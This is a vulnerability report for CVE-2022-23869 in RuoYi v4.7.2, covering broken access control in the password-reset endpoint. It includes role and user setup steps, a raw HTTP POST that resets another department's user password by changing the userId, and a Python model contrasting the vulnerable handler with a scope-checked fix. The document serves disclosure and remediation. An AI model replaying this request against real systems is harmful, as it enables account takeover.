CVE-2022-23869: Broken Access Control Vulnerability · Issue #I4RCO2 · 若依/RuoYi - Gitee.com
In RuoYi v4.7.2, through the WebUI, user test1 does not have permission to reset the password of user test3, yet test3's password can be reset by sending the /system/user/resetPwd request directly. The data-scope restriction is applied to what the user list displays, but not to the resetPwd endpoint itself.
Choose “System Management” -> “Role Management” (“系统管理” -> “角色管理”), and add the role “testrole”.
Set “Menu Permission” (“菜单权限”) as follows:
“Data Permission” -> “Data Scope” (“数据权限” -> “数据范围”) is set to “Data Permission of the department” (“本部门数据权限”), i.e. the role may only operate on data of its own department.

Add a user named test1 with userId 100, and a user named test3 with userId 102.
The “Home Department” (“归属部门”) of user test1 is “Marketing Department” (“市场部门”), and the “Role” (“角色”) is testrole.
The “Home Department” (“归属部门”) of user test3 is “Financial Department” (“财务部门”), and the “Role” (“角色”) is testrole.

After logging in, user test1 can see only user test1 of the “Marketing Department” (“市场部门”) in the user list, but not user test3 of the “Financial Department” (“财务部门”): the department data scope is enforced when listing users.

The WebUI provides a “password reset” (“重置密码”) function. Using the session cookie of user test1, invoke the resetPwd interface with the parameters of user test3 (userId=102 and loginName=test3) to reset test3's password:

POST /system/user/resetPwd HTTP/1.1
Host: localhost:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 42
Origin: http://localhost:8090
Connection: close
Referer: http://localhost:8090/system/user/resetPwd/100
Cookie: nav-style=default; JSESSIONID=xxxxxxx
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

userId=102&loginName=test3&password=123456
The server accepts the request and the password of user test3 is reset successfully, although test3 is outside test1's data scope. Note that the Referer is test1's own reset dialog (/system/user/resetPwd/100); only the userId in the POST body was changed from 100 to 102, so any logged-in user holding a department-scoped role can reset the password of any other user by guessing the userId.
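To make the missing check concrete, the following added example (written for this page, not RuoYi's own code) models the issue's setup in Python: a user directory with test1 (userId 100, 市场部门) and test3 (userId 102, 财务部门), both holding testrole with department data scope. `visible_users` is the list filter the reporter observed; `reset_pwd_vulnerable` trusts the client-supplied userId exactly as the issue describes, and `reset_pwd_fixed` resolves the target by userId and checks it against the session user's data scope before changing anything. The function and constant names (`build_users`, `in_data_scope`, `Forbidden`, the scope strings) and the placeholder password are assumptions; only the departments, user IDs and the POST body come from the issue.

```python
"""Model of the RuoYi resetPwd data-scope check (added example, not RuoYi's code).

Hypothetical names: build_users, in_data_scope, visible_users,
reset_pwd_vulnerable, reset_pwd_fixed, Forbidden. Department names, user IDs
and the POST body are taken from the issue; everything else is constructed.
"""
from dataclasses import dataclass
from urllib.parse import parse_qs

# Scope values modelled on the issue's "本部门数据权限" setting. Assumption:
# RuoYi's own data-scope codes are not reproduced here, only the semantics.
SCOPE_ALL = "all"
SCOPE_DEPT = "dept"    # may act only on users of the actor's own department
SCOPE_SELF = "self"


@dataclass
class Role:
    name: str
    data_scope: str


@dataclass
class User:
    user_id: int
    login_name: str
    dept: str
    role: Role
    password: str = "original-password"   # constructed placeholder


class Forbidden(Exception):
    """Raised when the caller's data scope does not cover the target user."""


def build_users():
    """Constructed directory mirroring the issue: test1 (id 100, 市场部门) and
    test3 (id 102, 财务部门), both holding testrole with department scope."""
    testrole = Role("testrole", SCOPE_DEPT)
    return {
        100: User(100, "test1", "市场部门", testrole),
        102: User(102, "test3", "财务部门", testrole),
    }


def in_data_scope(actor, target):
    """Server-side rule: may `actor` operate on `target` under its role's scope?"""
    scope = actor.role.data_scope
    if scope == SCOPE_ALL:
        return True
    if scope == SCOPE_DEPT:
        return actor.dept == target.dept
    return actor.user_id == target.user_id     # SCOPE_SELF


def visible_users(users, session_user_id):
    """What the user-list page shows: the UI filter the reporter observed.
    Display logic only; it protects nothing if an endpoint skips the check."""
    actor = users[session_user_id]
    return sorted(u.login_name for u in users.values() if in_data_scope(actor, u))


def _parse_body(body):
    """Parse the x-www-form-urlencoded body; loginName is deliberately unused."""
    params = parse_qs(body, strict_parsing=True)
    return int(params["userId"][0]), params["password"][0]


def reset_pwd_vulnerable(users, session_user_id, body):
    """Pre-fix behaviour as described in the issue: the session only proves the
    caller is logged in; the target is whatever userId the client sends."""
    target_id, new_password = _parse_body(body)
    users[target_id].password = new_password
    return "success"


def reset_pwd_fixed(users, session_user_id, body):
    """Hardened handler: resolve the target by userId, then check it against the
    session user's data scope before touching it. loginName is ignored for
    authorization because it is attacker-controlled too."""
    actor = users[session_user_id]
    target_id, new_password = _parse_body(body)
    target = users.get(target_id)
    if target is None or not in_data_scope(actor, target):
        # Same response for "not found" and "not in scope", so the endpoint
        # cannot be used to enumerate user IDs outside the caller's scope.
        raise Forbidden("user not found or not within data scope")
    target.password = new_password
    return "success"


# The POST body from the issue, replayed with test1's session (userId 100).
ISSUE_BODY = "userId=102&loginName=test3&password=123456"

if __name__ == "__main__":
    users = build_users()
    print("test1 sees:", visible_users(users, 100))            # ['test1']
    print("vulnerable:", reset_pwd_vulnerable(users, 100, ISSUE_BODY),
          "-> test3 password now", users[102].password)         # 123456
    users = build_users()
    try:
        reset_pwd_fixed(users, 100, ISSUE_BODY)
    except Forbidden as exc:
        print("fixed:", exc, "-> test3 password still", users[102].password)
```

The point the model makes is that the list filter and the endpoint must share the same scope rule: the vulnerable handler authenticates the session but authorizes nothing, while the fixed handler looks the target up by the submitted userId and refuses anything the caller's data scope does not cover, with one response for "not found" and "out of scope" so that userIds cannot be enumerated through the error.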